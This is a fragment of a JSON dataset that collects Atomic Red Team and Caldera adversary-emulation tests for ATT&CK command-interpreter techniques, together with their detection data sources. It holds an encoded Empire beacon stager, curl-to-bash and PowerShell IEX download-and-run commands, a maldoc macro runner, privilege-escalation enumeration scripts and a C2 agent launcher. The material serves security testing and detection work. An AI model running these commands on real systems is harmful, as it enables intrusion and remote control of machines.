\"t3VhVOs/DyCcDTFzIKanRxkvk3I=\", unless 'Little Snitch' is installed, in which case it will just exit. \nYou can use netcat to listen for the connection and verify execution, e.g. use \"nc -l 80\" in another terminal window before executing this test and watch for the request.\n\nReference: https://github.com/EmpireProject/Empire\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\\\\\" | python &\\\"\"\n", + "name": "sh" + } + } + ] + }, + { + "id": "de52784d-4de6-4d4e-b79e-e7b68fe037fb", + "name": "Add bookmark", + "description": "Add a malicous bookmark which looks like a current one", + "tactic": "execution", + "technique": { + "attack_id": "T1059.002", + "name": "Command and Scripting Interpreter: AppleScript" + }, + "platforms": { + "darwin": { + "sh": { + "command": "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n", + "payloads": [ + "bookmark.scpt" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.003", + "command_list": [ + "Start-Process #{script_path}\n", + "Start-Process $env:TEMP\\T1059.003_script.bat\n", + "echo \"#{message}\" > \"%TEMP%\\test.bin\" & type \"%TEMP%\\test.bin\"\n", + "echo \"Hello from the Windows Command Prompt!\" > \"#{file_contents_path}\" & type \"#{file_contents_path}\"\n", + "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > hello.txt & type hello.txt\n", + "%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > #{output_file} & type #{output_file}\n", + "cmd /c \"for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p $env:temp\\T1059_003note.txt\" | out-null\n", + null + ], + "commands": [ + { + "command": "Start-Process #{script_path}\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "Start-Process $env:TEMP\\T1059.003_script.bat\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "echo \"#{message}\" > \"%TEMP%\\test.bin\" & type \"%TEMP%\\test.bin\"\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "echo \"Hello from the Windows Command Prompt!\" > \"#{file_contents_path}\" & type \"#{file_contents_path}\"\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > hello.txt & type hello.txt\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > #{output_file} & type #{output_file}\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "cmd /c \"for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p $env:temp\\T1059_003note.txt\" | out-null\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": null, + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.003", + "display_name": "Command and Scripting Interpreter: Windows Command Shell", + "atomic_tests": [ + { + "name": "Create and Execute Batch Script", + "auto_generated_guid": "9e8894c0-50bd-4525-a96c-d4ac78ece388", + "description": "Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_to_execute": { + "description": "Command to execute within script.", + "type": "String", + "default": "dir" + }, + "script_path": { + "description": "Script path.", + "type": "Path", + "default": "$env:TEMP\\T1059.003_script.bat" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Batch file must exist on disk at specified location (#{script_path})\n", + "prereq_command": "if (Test-Path #{script_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item #{script_path} -Force | Out-Null\nSet-Content -Path #{script_path} -Value \"#{command_to_execute}\"\n" + } + ], + "executor": { + "command": "Start-Process #{script_path}\n", + "cleanup_command": "Remove-Item #{script_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Writes text to a file and displays it.", + "auto_generated_guid": "127b4afe-2346-4192-815c-69042bec570e", + "description": "Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_contents_path": { + "description": "Path to the file that the command prompt will drop.", + "type": "Path", + "default": "%TEMP%\\test.bin" + }, + "message": { + "description": "Message that will be written to disk and then displayed.", + "type": "String", + "default": "Hello from the Windows Command Prompt!" + } + }, + "executor": { + "command": "echo \"#{message}\" > \"#{file_contents_path}\" & type \"#{file_contents_path}\"\n", + "cleanup_command": "del \"#{file_contents_path}\" >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Suspicious Execution via Windows Command Shell", + "auto_generated_guid": "d0eb3597-a1b3-4d65-b33b-2cda8d397f20", + "description": "Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "File to output to", + "type": "String", + "default": "hello.txt" + }, + "input_message": { + "description": "Message to write to file", + "type": "String", + "default": "Hello, from CMD!" + } + }, + "executor": { + "command": "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}\n", + "name": "command_prompt" + } + }, + { + "name": "Simulate BlackByte Ransomware Print Bombing", + "auto_generated_guid": "6b2903ac-8f36-450d-9ad5-b220e8a2dcb9", + "description": "This test attempts to open a file a specified number of times in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_print": { + "description": "File to be opened/printed by Wordpad.", + "type": "String", + "default": "$env:temp\\T1059_003note.txt" + }, + "max_to_print": { + "description": "The maximum number of Wordpad windows the test will open/print.", + "type": "String", + "default": 75 + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "File to print must exist on disk at specified location (#{file_to_print})\n", + "prereq_command": "if (test-path \"#{file_to_print}\"){exit 0} else {exit 1}\n", + "get_prereq_command": "new-item #{file_to_print} -value \"This file has been created by T1059.003 Test 4\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "cmd /c \"for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}\" | out-null\n", + "cleanup_command": "stop-process -name wordpad -force -erroraction silentlycontinue\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.004", + "command_list": [ + "sh -c \"echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh\"\nsh -c \"echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh\"\nchmod +x /tmp/art.sh\nsh /tmp/art.sh\n", + "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", + "chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\nbash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\n", + "chmod +x #{autosuid}\nbash #{autosuid}\n", + "chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh\nbash PathToAtomicsFolder/T1059.004/src/LinEnum.sh\n", + "chmod +x #{linenum}\nbash #{linenum}\n", + "nohup ./sandcat.go -server #{server} &\n" + ], + "commands": [ + { + "command": "sh -c \"echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh\"\nsh -c \"echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh\"\nchmod +x /tmp/art.sh\nsh /tmp/art.sh\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\nbash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x #{autosuid}\nbash #{autosuid}\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh\nbash PathToAtomicsFolder/T1059.004/src/LinEnum.sh\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x #{linenum}\nbash #{linenum}\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "nohup ./sandcat.go -server #{server} &\n", + "source": "data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml", + "name": "Start a new 54ndc47 agent in background" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.004", + "display_name": "Command and Scripting Interpreter: Bash", + "atomic_tests": [ + { + "name": "Create and Execute Bash Shell Script", + "auto_generated_guid": "7e7ac3ed-f795-4fa5-b711-09d6fbe9b873", + "description": "Creates and executes a simple bash script.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "script_path": { + "description": "Script path", + "type": "Path", + "default": "/tmp/art.sh" + } + }, + "executor": { + "command": "sh -c \"echo 'echo Hello from the Atomic Red Team' > #{script_path}\"\nsh -c \"echo 'ping -c 4 8.8.8.8' >> #{script_path}\"\nchmod +x #{script_path}\nsh #{script_path}\n", + "cleanup_command": "rm #{script_path}\n", + "name": "sh" + } + }, + { + "name": "Command-Line Interface", + "auto_generated_guid": "d0c88567-803d-4dca-99b4-7ce65e7b257c", + "description": "Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.\n\nUpon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", + "cleanup_command": "rm /tmp/art-fish.txt\n", + "name": "sh" + } + }, + { + "name": "Harvest SUID executable files", + "auto_generated_guid": "46274fc6-08a7-4956-861b-24cbbaa0503c", + "description": "AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "autosuid": { + "description": "Path to the autosuid shell script", + "type": "Path", + "default": "PathToAtomicsFolder/T1059.004/src/AutoSUID.sh" + }, + "autosuid_url": { + "description": "Path to download autosuid shell script", + "type": "Url", + "default": "https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "AutoSUID must exist on disk at specified location (#{autosuid})\n", + "prereq_command": "if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "curl #{autosuid_url} --output #{autosuid}\n" + } + ], + "executor": { + "command": "chmod +x #{autosuid}\nbash #{autosuid}\n", + "name": "sh" + } + }, + { + "name": "LinEnum tool execution", + "auto_generated_guid": "a2b35a63-9df1-4806-9a4d-5fe0500845f2", + "description": "LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "linenum": { + "description": "Path to the LinEnum shell script", + "type": "Path", + "default": "PathToAtomicsFolder/T1059.004/src/LinEnum.sh" + }, + "linenum_url": { + "description": "Path to download LinEnum shell script", + "type": "Url", + "default": "https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "LinnEnum must exist on disk at specified location (#{linenum})\n", + "prereq_command": "if [ -f #{linenum} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "curl #{linenum_url} --output #{linenum}\n" + } + ], + "executor": { + "command": "chmod +x #{linenum}\nbash #{linenum}\n", + "name": "sh" + } + } + ] + }, + { + "id": "b1d41972-3ad9-4aa1-8f7f-05f049a2980e", + "name": "Start 54ndc47", + "description": "Start a new 54ndc47 agent in background", + "tactic": "execution", + "technique": { + "attack_id": "T1059.004", + "name": "Command and Scripting Interpreter: Unix Shell" + }, + "platforms": { + "darwin": { + "sh": { + "command": "nohup ./sandcat.go -server #{server} &\n", + "cleanup": "pkill -f sandcat\n", + "payloads": [ + "sandcat.go" + ] + } + }, + "linux": { + "sh": { + "command": "nohup ./sandcat.go -server #{server} &\n", + "cleanup": "pkill -f sandcat\n", + "payloads": [ + "sandcat.go" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.005", + "command_list": [ + "cscript PathToAtomicsFolder\\T1059.005\\src\\sys_info.vbs > $env:TEMP\\T1059.005.out.txt", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" + ], + "commands": [ + { + "command": "cscript PathToAtomicsFolder\\T1059.005\\src\\sys_info.vbs > $env:TEMP\\T1059.005.out.txt", + "source": "atomics/T1059.005/T1059.005.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Visual Basic" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", + "source": "atomics/T1059.005/T1059.005.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Visual Basic" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "source": "atomics/T1059.005/T1059.005.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Visual Basic" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.005", + "display_name": "Command and Scripting Interpreter: Visual Basic", + "atomic_tests": [ + { + "name": "Visual Basic script execution to gather local computer information", + "auto_generated_guid": "1620de42-160a-4fe5-bbaf-d3fef0181ce9", + "description": "Visual Basic execution test, execute vbscript via PowerShell.\n\nWhen successful, system information will be written to $env:TEMP\\T1059.005.out.txt.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vbscript": { + "description": "Path to sample script", + "type": "String", + "default": "PathToAtomicsFolder\\T1059.005\\src\\sys_info.vbs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sample script must exist on disk at specified location (#{vbscript})", + "prereq_command": "if (Test-Path #{vbscript}) {exit 0} else {exit 1} ", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs\" -OutFile \"#{vbscript}\"" + } + ], + "executor": { + "command": "cscript #{vbscript} > $env:TEMP\\T1059.005.out.txt", + "cleanup_command": "Remove-Item $env:TEMP\\T1059.005.out.txt -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "Encoded VBS code execution", + "auto_generated_guid": "e8209d5f-e42d-45e6-9c2f-633ac4f1eefa", + "description": "This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution\na message box will pop up displaying \"ART T1059.005\"\n\nA note regarding this module, due to the way that this module utilizes \"ScriptControl\" a 64bit version of Microsoft Office is required.\nYou can validate this by opening WinWord -> File -> Account -> About Word\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The 64-bit version of Microsoft Office must be installed\n", + "prereq_command": "try {\n $wdApp = New-Object -COMObject \"Word.Application\"\n $path = $wdApp.Path\n Stop-Process -Name \"winword\"\n if ($path.contains(\"(x86)\")) { exit 1 } else { exit 0 }\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word (64-bit) manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", + "cleanup_command": "Get-WmiObject win32_process | Where-Object {$_.CommandLine -like \"*mshta*\"} | % { \"$(Stop-Process $_.ProcessID)\" } | Out-Null\n", + "name": "powershell" + } + }, + { + "name": "Extract Memory via VBA", + "auto_generated_guid": "8faff437-a114-4547-9a60-749652a03df6", + "description": "This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this\nwe first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that\nmemory location to a file stored in the $env:TEMP\\atomic_t1059_005_test_output.bin.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ms_product": { + "description": "Maldoc application Word", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "cleanup_command": "Remove-Item \"$env:TEMP\\atomic_t1059_005_test_output.bin\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 